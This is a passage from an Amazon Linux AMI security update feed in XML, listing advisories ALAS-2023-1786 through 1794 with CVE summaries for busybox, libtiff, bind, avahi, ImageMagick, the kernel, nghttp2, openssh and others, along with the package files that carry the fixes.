arch="i686"><filename>Packages/wireshark-1.8.10-25.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1786</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1786: medium priority package update for busybox</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-30065:
A use-after-free in Busybox 1.35-x's awk applet leads to denial of service and possibly code execution when processing a crafted awk pattern in the copyvar function.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30065" title="" id="CVE-2022-30065" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="busybox-petitboot" version="1.34.1" release="1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-petitboot-1.34.1-1.15.amzn1.x86_64.rpm</filename></package><package name="busybox" version="1.34.1" release="1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-1.34.1-1.15.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.15.amzn1" epoch="1" arch="x86_64"><filename>Packages/busybox-debuginfo-1.34.1-1.15.amzn1.x86_64.rpm</filename></package><package name="busybox-debuginfo" version="1.34.1" release="1.15.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-debuginfo-1.34.1-1.15.amzn1.i686.rpm</filename></package><package name="busybox" version="1.34.1" release="1.15.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-1.34.1-1.15.amzn1.i686.rpm</filename></package><package name="busybox-petitboot" version="1.34.1" release="1.15.amzn1" epoch="1" arch="i686"><filename>Packages/busybox-petitboot-1.34.1-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1787</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1787: medium priority package update for python-imaging</title><issued date="2023-07-13 23:57:00" /><updated date="2023-07-19 21:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-9190:
Pillow before 3.3.2 allows context-dependent attackers to execute arbitrary code by using the "crafted image file" approach, related to an "Insecure Sign Extension" issue affecting the ImagingNew in Storage.c component.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9190" title="" id="CVE-2016-9190" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python26-imaging-devel" version="1.1.6" release="19.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-imaging-devel-1.1.6-19.10.amzn1.x86_64.rpm</filename></package><package name="python26-imaging" version="1.1.6" release="19.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-imaging-1.1.6-19.10.amzn1.x86_64.rpm</filename></package><package name="python-imaging-debuginfo" version="1.1.6" release="19.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-imaging-debuginfo-1.1.6-19.10.amzn1.x86_64.rpm</filename></package><package name="python27-imaging-devel" version="1.1.6" release="19.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-imaging-devel-1.1.6-19.10.amzn1.x86_64.rpm</filename></package><package name="python27-imaging" version="1.1.6" release="19.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-imaging-1.1.6-19.10.amzn1.x86_64.rpm</filename></package><package name="python27-imaging" version="1.1.6" release="19.10.amzn1" epoch="0" arch="i686"><filename>Packages/python27-imaging-1.1.6-19.10.amzn1.i686.rpm</filename></package><package name="python27-imaging-devel" version="1.1.6" release="19.10.amzn1" epoch="0" arch="i686"><filename>Packages/python27-imaging-devel-1.1.6-19.10.amzn1.i686.rpm</filename></package><package name="python26-imaging" version="1.1.6" release="19.10.amzn1" epoch="0" arch="i686"><filename>Packages/python26-imaging-1.1.6-19.10.amzn1.i686.rpm</filename></package><package name="python-imaging-debuginfo" version="1.1.6" release="19.10.amzn1" epoch="0" arch="i686"><filename>Packages/python-imaging-debuginfo-1.1.6-19.10.amzn1.i686.rpm</filename></package><package name="python26-imaging-devel" version="1.1.6" release="19.10.amzn1" epoch="0" 
arch="i686"><filename>Packages/python26-imaging-devel-1.1.6-19.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1788</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1788: medium priority package update for libtiff</title><issued date="2023-07-19 22:14:00" /><updated date="2023-07-25 23:24:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3576:
Memory leak in tiffcrop.c.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3576" title="" id="CVE-2023-3576" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-debuginfo" version="4.0.3" release="35.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-35.43.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-35.43.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-35.43.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.43.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-35.43.amzn1.x86_64.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="35.43.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-35.43.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="35.43.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-35.43.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="35.43.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-35.43.amzn1.i686.rpm</filename></package><package name="libtiff" version="4.0.3" release="35.43.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-35.43.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1789</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1789: important priority package update for bind</title><issued date="2023-07-19 22:14:00" /><updated date="2023-07-25 23:24:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-2828:
A vulnerability was found in BIND. The effectiveness of the cache-cleaning algorithm used in named can be severely diminished by querying the resolver for specific RRsets in a certain order, effectively allowing the configured max-cache-size limit to be significantly exceeded.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2828" title="" id="CVE-2023-2828" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-chroot" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.68.rc1.90.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-sdb-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.68.rc1.90.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.68.rc1.90.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1790</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1790: medium priority package update for avahi</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-38471:
A reachable assertion was found in dbus_set_host_name.
CVE-2023-38470:
A reachable assertion was found in avahi_escape_label.
CVE-2023-38469:
A reachable assertion was found in avahi_dns_packet_append_record.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38469" title="" id="CVE-2023-38469" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38470" title="" id="CVE-2023-38470" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38471" title="" id="CVE-2023-38471" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="avahi-glib" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-glib-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-tools" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-tools-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-gobject" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-gobject-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-compat-libdns_sd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-compat-libdns_sd-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-autoipd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-autoipd-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-debuginfo" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-debuginfo-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-libs" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-libs-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-devel" version="0.6.25" release="12.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/avahi-devel-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-compat-howl" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-compat-howl-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-compat-howl-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-compat-howl-devel-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-gobject-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-gobject-devel-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-dnsconfd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-dnsconfd-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-glib-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-glib-devel-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-compat-libdns_sd-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/avahi-compat-libdns_sd-devel-0.6.25-12.19.amzn1.x86_64.rpm</filename></package><package name="avahi-compat-howl" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-compat-howl-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-devel-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-gobject-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-gobject-devel-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-dnsconfd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-dnsconfd-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-autoipd" version="0.6.25" 
release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-autoipd-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-gobject" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-gobject-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-libs" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-libs-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-tools" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-tools-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-glib" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-glib-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-compat-libdns_sd-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-compat-libdns_sd-devel-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-compat-libdns_sd" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-compat-libdns_sd-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-glib-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-glib-devel-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-compat-howl-devel" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-compat-howl-devel-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-0.6.25-12.19.amzn1.i686.rpm</filename></package><package name="avahi-debuginfo" version="0.6.25" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/avahi-debuginfo-0.6.25-12.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" 
type="security" from="linux-security@amazon.com"><id>ALAS-2023-1791</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1791: medium priority package update for ImageMagick</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3745:
A heap-based buffer overflow issue was found in ImageMagick's PushCharPixel() function in quantum-private.h. This issue may allow a local attacker to trick the user into opening a specially crafted file, triggering an out-of-bounds read error and allowing an application to crash, resulting in a denial of service.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3745" title="" id="CVE-2023-3745" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.9.10.97-1.27.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.9.10.97" release="1.27.amzn1" epoch="0" 
arch="i686"><filename>Packages/ImageMagick-c++-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.9.10.97-1.27.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.9.10.97" release="1.27.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.9.10.97-1.27.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1792</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1792: important priority package update for kernel</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:48:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-3776:
A use-after-free vulnerability in the Linux kernel's net/sched: cls_fw component can be exploited to achieve local privilege escalation.
If tcf_change_indev() fails, fw_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.
We recommend upgrading past commit 0323bce598eea038714f941ce2b22541c46d488f.
CVE-2023-3611:
An out-of-bounds write vulnerability in the Linux kernel's net/sched: sch_qfq component can be exploited to achieve local privilege escalation.
The qfq_change_agg() function in net/sched/sch_qfq.c allows an out-of-bounds write because lmax is updated according to packet sizes without bounds checks.
We recommend upgrading past commit 3e337087c3b5805fe0b8a46ba622a962880b5d64.
CVE-2023-3609:
A use-after-free vulnerability in the Linux kernel's net/sched: cls_u32 component can be exploited to achieve local privilege escalation.
If tcf_change_indev() fails, u32_set_parms() will immediately return an error after incrementing or decrementing the reference counter in tcf_bind_filter(). If an attacker can control the reference counter and set it to zero, they can cause the reference to be freed, leading to a use-after-free vulnerability.
We recommend upgrading past commit 04c55383fa5689357bcdd2c8036725a55ed632bc.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3609" title="" id="CVE-2023-3609" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3611" title="" id="CVE-2023-3611" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3776" title="" id="CVE-2023-3776" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.320" 
release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.320" release="169.544.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.320-169.544.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.320-169.544.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.320-169.544.amzn1.i686.rpm</filename></package><package 
name="kernel-debuginfo-common-i686" version="4.14.320" release="169.544.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.320-169.544.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1793</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1793: important priority package update for nghttp2</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-35945:
Envoy is a cloud-native high-performance edge/middle/service proxy. Envoy's HTTP/2 codec may leak a header map and bookkeeping structures upon receiving `RST_STREAM` immediately followed by the `GOAWAY` frames from an upstream server. In nghttp2, cleanup of pending requests due to receipt of the `GOAWAY` frame skips de-allocation of the bookkeeping structure and pending compressed header. The error return [code path] is taken if the connection is already marked for not sending more requests due to a `GOAWAY` frame. The clean-up code is right after the return statement, causing a memory leak. Denial of service through memory exhaustion. This vulnerability was patched in version(s) 1.26.3, 1.25.8, 1.24.9, 1.23.11.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35945" title="" id="CVE-2023-35945" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nghttp2" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-1.33.0-1.1.7.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-1.33.0-1.1.7.amzn1.x86_64.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.7.amzn1.x86_64.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/libnghttp2-devel-1.33.0-1.1.7.amzn1.x86_64.rpm</filename></package><package name="libnghttp2" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-1.33.0-1.1.7.amzn1.i686.rpm</filename></package><package name="nghttp2" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-1.33.0-1.1.7.amzn1.i686.rpm</filename></package><package name="nghttp2-debuginfo" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/nghttp2-debuginfo-1.33.0-1.1.7.amzn1.i686.rpm</filename></package><package name="libnghttp2-devel" version="1.33.0" release="1.1.7.amzn1" epoch="0" arch="i686"><filename>Packages/libnghttp2-devel-1.33.0-1.1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1794</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1794: medium priority package update for openssh</title><issued date="2023-08-03 20:16:00" /><updated date="2023-08-08 20:52:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-35812:
An issue was discovered in OpenSSH 7.4 on Amazon Linux 2 and Amazon Linux 1. The fix for CVE-2019-6111 only covered cases where an absolute path is passed to scp. When a relative path is used there is no verification that the name of a file received by the client matches the file requested.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35812" title="" id="CVE-2023-35812" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-server" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.10.3" release="2.22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.10.3-2.22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-cavs" version="7.4p1" release="22.78.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-cavs-7.4p1-22.78.amzn1.x86_64.rpm</filename></package><package name="openssh-debuginfo" version="7.4p1" 